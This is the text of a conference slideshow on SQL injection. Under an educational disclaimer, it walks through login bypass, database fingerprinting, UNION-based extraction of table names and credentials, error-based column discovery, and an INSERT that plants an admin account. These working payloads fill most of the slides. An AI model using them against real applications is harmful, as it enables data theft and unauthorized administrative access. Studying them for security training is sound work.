Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How did i steal your database CSCamp2011

1,682 views

Published on

Published in: Technology
  • Be the first to comment

How did i steal your database CSCamp2011

  1. 1. How Did I Steal Your Database<br />Mostafa Siraj<br />Application Security Expert<br />
  2. 2. DISCLAIMER<br />Hacking websites is ILLEGAL<br />This presentation is meant for educational purposes ONLY<br />Only use this stuff on YOUR website and YOUR account<br />
  3. 3. Nearly all applications rely on a Datastore<br />
  4. 4. What is Database<br />A Collection of Tables (Users, Orders, Countries,..etc)<br />The tables are a collection of columns/rows<br />
  5. 5. What is SQL<br />A query language that allows interacting with the database<br />SQL can<br />Retrieve data from the database<br />Insert new records in the database<br />Delete records from the database<br />Update records in the database<br />
  6. 6. SQL Queries<br />To get all data about Username elprince:<br />SELECTUsername,Password, First_Name,Last_Name, Password<br />FROM Users<br />WHERE Username=‘elprince’<br />Gives a result:<br />
  7. 7. FACT<br />Amongst Codd's rules for a Relational Database:<br />Metadata must be stored in the database just as regular data is<br />
  8. 8. SQL Injection<br />is a technique where an attacker creates or alters existing SQL commands<br />Expose hidden data (e.g. steal all the records from the tables)<br />Override the data (e.g. Administrators password)<br />Execute dangerous system level commands on the database host<br />
  9. 9. SQL Injection Login Example<br />SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’<br />If the user entered Elprince, Elprince123the query will be<br />SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’<br />
  10. 10. SQL Injection Ex Cont<br />Suppose the User entered ‘ OR 1=1--, 123 the query will be<br />SELECT * FROM Users WHERE <br />Username=‘‘ OR 1=1--’ AND Password=‘123’<br />-- comments everything afterwards, so the query will be<br />SELECT * FROM Users WHERE <br />Username=‘‘ OR 1=1--<br />
  11. 11. This is not enough<br />You can enhance the injection to login with the administrator account<br />Enter ‘ or 1=1 ORDER BY 1--, abc the query will be<br />SELECT * FROM Users WHERE <br />Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’<br />
  12. 12. Finding SQL Injection Bugs<br /> Submit single quotation mark and observe the result<br /> Submit two single quotations and observe the result<br />
  13. 13. Finding SQL Injection Bugs<br /> For multistate processes, complete all the states before observing the results<br /> For search fields try using the wildcard character %<br />
  14. 14. Finding SQL Injection Bugs<br /> For numeric data, if the original value was 2 try submitting <br /> 1+1 or 3-1<br /> If successful try using SQL-specific keywords, e.g. <br /> 67-ASCII(‘A’)<br /> If single quotes are filtered try<br /> 51-ASCII(1) [note ASCII(1)=49]<br />
  15. 15. Identify the database engine<br /> The error messages will let us know the DB engine<br /> We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)<br />
  16. 16. Identify the database engine<br />Use specific characters or commands:<br />String concatenation in different DB engines<br /> : ‘||’FOO<br /> : ‘+’FOO<br /> : ‘‘FOO [note the space btw the 2 quotes]<br />
  17. 17. Identify User privileges<br />‘ and 1 in (SELECTuser) --<br />‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--<br />
  18. 18. Injection in Search Fields<br />35<br />
  19. 19. Entering Normal Input<br />
  20. 20. Search Results<br />
  21. 21. Trying Single Quote<br />
  22. 22. I receive this error<br />Error states that it’s<br />
  23. 23. Suppose I still don’t know the DB engine, Is it <br />Note: string concatenation in is +<br />
  24. 24. I’m having an error, it’s not<br />
  25. 25. Is it<br />Note: string concatenation in Oracle is ||<br />
  26. 26. Different error, still not <br />
  27. 27. Is it<br />Note: string concatenation in MySQL is blank space<br />
  28. 28. It’s<br />
  29. 29. The query in the backend is something like that<br />SELECT …,…,…,…,…<br />FROM ….<br />WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….<br />A possible location for my input<br />
  30. 30. The Strategy<br />Get number of items after the SELECT statement<br />How many items are here<br />SELECT …,…,…,…,…<br />FROM ….<br />WHERE ….=…. AND ….!=….. OR …..>……<br />
  31. 31. The Strategy<br />2. Identify the location of the STRINGS in the SELECT Statement<br />Which of those are strings<br />SELECT …,…,…,…,…<br />FROM ….<br />WHERE ….=…. AND ….!=….. OR …..>……<br />
  32. 32. The Strategy<br />3. Get the Structure of the database<br />SELECT …,…,…,…,…<br />FROM ….<br />WHERE …. UNION <br />SELECT ….,TableNames,….,….,…<br />FROM DatabaseStructure --=…. AND ….!=….. OR …..>……<br />
  33. 33. The Strategy<br />4. Get the data from the database<br />SELECT …,…,…,…,…<br />FROM ….<br />WHERE …. UNION <br />SELECT ….,Usernames,….,….,…<br />FROM Users --=…. AND ….!=….. OR …..>……<br />
  34. 34. The Strategy<br />Get number of items after the SELECT statement<br />Identify the location of the STRINGS in the SELECT Statement<br />3. Get the Structure of the database<br />4. Get the data from the database<br />
  35. 35. 1. Get number of items after the SELECT statement<br />
  36. 36. Error<br />
  37. 37. Try another number<br />
  38. 38. Result<br />Why the results are less?<br />
  39. 39. Try another number<br />
  40. 40. Error, it’s not 8<br />
  41. 41. Let’s try 7<br />
  42. 42. Result<br />How many columns do we have in the SELECT statement<br />
  43. 43. The Strategy<br />Get number of items after the SELECT statement<br />Identify the location of the STRINGS in the SELECT Statement<br />3. Get the Structure of the database<br />4. Get the data from the database<br />
  44. 44. 2. Identify the location of the STRINGS in the SELECT Statement<br />1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />
  45. 45. Result<br />
  46. 46. Get the Strings and the locations<br />1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#<br />
  47. 47. Result<br />
  48. 48. The Strategy<br />Get number of items after the SELECT statement<br />Identify the location of the STRINGS in the SELECT Statement<br />3. Get the Structure of the database<br />4. Get the data from the database<br />
  49. 49. 3. Get the Structure of the database<br />1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#<br />
  50. 50. Result<br />
  51. 51. The Strategy<br />Get number of items after the SELECT statement<br />Identify the location of the STRINGS in the SELECT Statement<br />3. Get the Structure of the database<br />4. Get the data from the database<br />
  52. 52. Next Queries<br />1234') <br />UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'#<br />1234') UNION SELECT<br />NULL,NULL,NULL,username,password,null,null<br />FROM users <br />WHERE id<100#<br />…….<br />Continue till you get all the tables<br />
  53. 53. The Strategy<br />Get number of items after the SELECT statement<br />Identify the location of the STRINGS in the SELECT Statement<br />3. Get the Structure of the database<br />4. Get the data from the database<br />
  54. 54. Injection with errors<br />
  55. 55. Gives me an Error<br />
  56. 56. Getting version<br />' and 1 in (SELECT @@version)--<br />
  57. 57. Gives me this error<br />
  58. 58. Getting Column names<br />
  59. 59. I get this Error<br />
  60. 60. Getting next column name<br />' group by login.firstname having 1=1--<br />
  61. 61. I get this error<br />
  62. 62. Again<br />' group by login.firstname, login.surname having 1=1--<br />
  63. 63. Error reveals new column name<br />
  64. 64. Again<br />' group by login.firstname, login.surname,login.username having 1=1--<br />
  65. 65. New column name<br />
  66. 66. Continue…<br />
  67. 67. Continue…<br />
  68. 68. Continue…<br />After getting all of the columns I found a field called IsAdmin-that’s my goal -<br />Putting the following query creates an admin account on the application<br />‘; INSERT INTO Login<br />(username,pwd,IsAdmin,……)<br />VALUES<br />(‘Administrator’,’******’,TRUE,…..)<br />
  69. 69. Not all Injections generate errors<br />
  70. 70. DEMOSQLMap<br />
  71. 71. You Were GREAT Audience<br />
  72. 72. Thank You<br />@mostafasiraj<br />Mostafa Siraj<br />

×